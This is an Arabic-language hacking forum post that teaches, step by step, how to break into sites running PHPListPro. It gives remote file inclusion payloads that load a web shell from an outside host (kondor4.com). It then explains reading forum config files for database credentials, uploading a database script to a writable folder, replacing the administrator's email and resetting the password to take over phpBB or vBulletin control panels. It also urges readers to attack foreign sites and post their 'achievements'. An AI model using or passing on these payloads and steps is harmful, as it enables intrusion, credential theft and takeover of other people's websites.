اليوم راح نشرح ثغرة في سكربت PHPListPro سكربت سباق المواقع مواقع كثير جدا مصابة بها وقليل منها بالمواقع العربية والحمدلله حذرت الكثير من المواقع العربية بهذة الثغرة وراح نشرح الثغرة خطوة بخطوة حتي نخترق الموقع وندخل لوحة تحكم المنتدي نفسة لنبدأ علي بركة الله
editsite.php?returnpath=http://www.kondor4.com/HY0.txt? او
كود PHP:
config.php?returnpath=http://www.kondor4.com/HY0.txt? او
كود PHP:
in.php?returnpath=http://www.kondor4.com/HY0.txt? او
كود PHP:
addsite.php?returnpath=http://www.kondor4.com/HY0.txt? راح نطبق الدرس علي الاستثمار مثلا هذا
كود PHP:
config.php?returnpath=http://www.kondor4.com/HY0.txt? الان بعد رابط الموقع ضع الاستثمار ليصبح كلتالي
ببساطة راح تدخل الشل
الان نلقي نظرة علي ملفات الموقع ونشوف فين ملف المنتدى نشوف هنلاقي اية
ابو الشباب مزاجة رايق مركب 3 منتديات 2 منتدي من نوع vBulletin والثالث من نوع phpbb راح نطبق علي الاثنين لنبدا اولا بمنتدي phpbb ندخل مجلد المنتدي ومن ثم البحث عن ملف الكونفيج
وندخل نقرأ بيانات الكونفيج
انسخ البيانات اللي راح تلاقيها بملف الكونفيج
لو المنتدي اللي راح تخترقة منتدي vb قم بالدخول الي المجلد المنتدي ومن ثم ادخل علي
ومن ثم ابحث علي ملف الكونفيج
كل المنتديات طريقتها واحدة تقريبا يعني مافي فرق طيب الان معنا بيانات الكونفيج نبدأ باستغلالها في اعلي الشل اضغط
يظهر لك مثل
نكتب فيها بيانات الكونفيح اللي طلعناها توضيح مثلا
طيب لو تم الدخول ندخل علي جول اليوزر ونغير اميلنا باميل صاحب الموقع الطريقة محفوظة بي هذة الطريقة تتوقف علي حسب صلاحياتك علي السيرفر الافضل نرفع سكربت يتصل بقواعد البيانات هذة الطريقة افضل في هذة الحالة سكربت الاتصال بقواعد البيانات موجود بالمرفقات حملة وتابع معي الشرح طيب الان عايزين نرفع ملف السكربت لازم نشوف مجلد علية تصريح 777 حتي نتمكن من رفع السكربت فية نرجع الي الشل ونشوف اي مجلد علية تصريح
عندنا مجلدين عليهم التصريح طيب ندخل اي مجلد علية تصريح ونزل الي اسفل حتي نري
ارفع السكربت
ثم
طيب الان رفعنا السكربت بمجلد banners والسكربت اسمة sql.php يعني الامتداد كدة banners/sql.php يعني يكون الرابط كالتالي www.xxxx.com/banners/sql.php
نجد السكربت شغال
نكتب بيانات اللي معنا من ملف الكونفيج فية
توضيح
الان بعد الدخول نلاقي كل قواعد البيانات ظاهرة امامنا
نبحث ونختار منها قاعدة بيانات المنتدي اللي طلعناها من ملف الكونفيج ونضغط علي القاعدة
الان اذهب الي المنتدي وقم بطلب كلمة المرور (نموذج استعادة كلمة المرور)
انتظر حتي تصلك علي البريد كلمة المرور الجديدة ثم ادخل بيها المنتدي
وتقدر تدخل الان لوحة تحكم المنتدي
مبروك علية تم الاختراق افعل ما شئت بالمنتدي
طبعا بالنهاية تم تبليغ صاحب الموقع بالثغرة والله علي ما اقول شهيد
ابعدوا عن المواقع العربية ياشباب تري وربي المواقع الاجنبية مصابة بكثرة
بالنهاية اتمني يكون الشرح واضح وسهل وضحت فية علي قدر المستطاع وعايزين نشوف قسم الانجازات ممتلئ من الاختراقات والابطردكم من المنتدي كلة تحياتي الي الجميع الكوندور المصري